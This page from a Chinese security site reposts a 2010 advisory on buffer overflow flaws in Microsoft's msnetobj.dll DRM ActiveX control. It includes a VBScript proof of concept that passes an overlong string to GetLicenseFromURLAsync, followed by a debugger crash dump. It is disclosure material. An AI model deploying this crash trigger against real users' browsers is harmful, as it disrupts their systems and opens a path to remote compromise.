首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft DRM Technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
来源:informationhacker08@gmail.com 作者:Tripathi 发布时间:2010-09-21  

                    ============================================================================================

                             Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
                     ===========================================================================================

                                                     by

                                            Asheesh Kumar Mani Tripathi


# Vulnerability Discovered By Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company       www.aksitservices.co.in

# Credit by Asheesh Anaconda

# Date 18th Sep 2010

# Description: Microsoft DRM technology (msnetobj.dll) ActiveX suffers from multiple remote vulnerabilities
             such as buffer overflow, integer overflow and denial of service (IE crash). This issue is
             triggered when an attacker convinces a victim user to visit a malicious website.

             The "GetLicenseFromURLAsync" function does not handle input correctly.
 
             Remote attackers may exploit this issue to execute arbitrary machine code in the context of
             the affected application, facilitating the remote compromise of affected computers. Failed
             exploit attempts likely result in browser crashes.

=============================================Proof Of Concept=============================================
 


<object classid='clsid:A9FC132B-096D-460B-B7D5-1DB0FAE0C062' id='RM' />
<script language='vbscript'>

targetFile = "C:\Windows\System32\msnetobj.dll"
prototype  = "Sub GetLicenseFromURLAsync ( ByVal bstrXMLDoc As String ,  ByVal bstrURL As String )"
memberName = "GetLicenseFromURLAsync"
progid     = "MSNETOBJLib.RMGetLicense"
argCount   = 2

arg1="defaultV"
arg2=String(8212, "A")

RM.GetLicenseFromURLAsync(arg1 ,arg2)

</script>
=============================================Exception details=============================================
Exception Code: ACCESS_VIOLATION
Disasm: 77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]

Seh Chain:
--------------------------------------------------
1  76E7E47D  msvcrt.dll
2  77BB99FA  ntdll.dll


Called From                   Returns To                   
--------------------------------------------------
ntdll.77BEEA7F                ntdll.77BEE9D9               
ntdll.77BEE9D9                KERNEL32.770E7F75            
KERNEL32.770E7F75             ole32.779EB3E1               
ole32.779EB3E1                ole32.779EB50A               
ole32.779EB50A                ole32.779AF6F6               
ole32.779AF6F6                ole32.779AF794               
ole32.779AF794                msnetobj.6B823726            
msnetobj.6B823726             msnetobj.6B823814            
msnetobj.6B823814             msnetobj.6B823C40            
msnetobj.6B823C40             msnetobj.6B823FA7            
msnetobj.6B823FA7             msnetobj.6B824513            
msnetobj.6B824513             msnetobj.6B823A9D            
msnetobj.6B823A9D             msvcrt.76E82599              
msvcrt.76E82599               msvcrt.76E826B3              
msvcrt.76E826B3               KERNEL32.770ED0E9            
KERNEL32.770ED0E9             ntdll.77BF19BB               
ntdll.77BF19BB                ntdll.77BF198E               


Registers:
--------------------------------------------------
EIP 77BEEA7F
EAX 00000054
EBX 00032A78 -> Asc: GsHd(
ECX 00000000
EDX 00000004
EDI 035CEE28 -> 7FFD8000
ESI 6B821434
EBP 035CEE48 -> 035CEE90
ESP 035CEE0C -> 00032A78


Block Disassembly:
--------------------------------------------------
77BEEA68 PUSH EDI
77BEEA69 JNZ 77C25E3F
77BEEA6F TEST BYTE PTR [EBX+10],1
77BEEA73 JE 77C25E93
77BEEA79 MOV EAX,[EBX+18]
77BEEA7C LEA EDI,[EBP-20]
77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]   <--- CRASH
77BEEA80 PUSH 77BEEABD
77BEEA85 MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77BEEA86 PUSH 1C
77BEEA88 ADD EAX,EBX
77BEEA8A PUSH EDX
77BEEA8B MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77BEEA8C PUSH EAX
77BEEA8D LEA EAX,[EBP-20]


ArgDump:
--------------------------------------------------
EBP+8 00032A78 -> Asc: GsHd(
EBP+12 6B821434
EBP+16 035CEEB0 -> 00000040
EBP+20 00000000
EBP+24 77AC1424 -> 779EBEC8
EBP+28 6B821434


Stack Dump:
--------------------------------------------------
35CEE0C 78 2A 03 00 08 00 15 C0 00 00 00 00 B0 EE 5C 03  [..............\.]
35CEE1C 04 00 00 00 34 14 82 6B 00 90 FD 7F 00 80 FD 7F  [.......k........]
35CEE2C 44 EE 5C 03 01 6C BF 77 68 EE 5C 03 84 EE 5C 03  [D.\..l.wh.\...\.]
35CEE3C 88 EE 5C 03 80 EE 5C 03 92 59 7C 75 90 EE 5C 03  [..\...\..Y.u..\.]
35CEE4C D9 E9 BE 77 78 2A 03 00 34 14 82 6B B0 EE 5C 03  [...w.......k..\.]

 

ApiLog
--------------------------------------------------

***** Installing Hooks *****
7735d5c0     RegCreateKeyExA (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,(null))
Debug String Log
--------------------------------------------------
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Java CMM readMabCurveData Stac
·RarCrack v0.2 "filename" init(
·VWD-CMS CSRF Vulnerability
·BifrsoT DLL Hijacking Exploit
·SWiSHmax DLL Hijacking Exploit
·万博网站管理系统(NWEB)通杀漏洞
·RarCrack 0.2 Buffer Overflow P
·Audiotran 1.4.2.4 SEH Overflow
·Personal.Net Portal Multiple V
·Novell iPrint Client Browser P
·Acoustica Audio Converter Pro
·Softek Barcode Reader Toolkit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved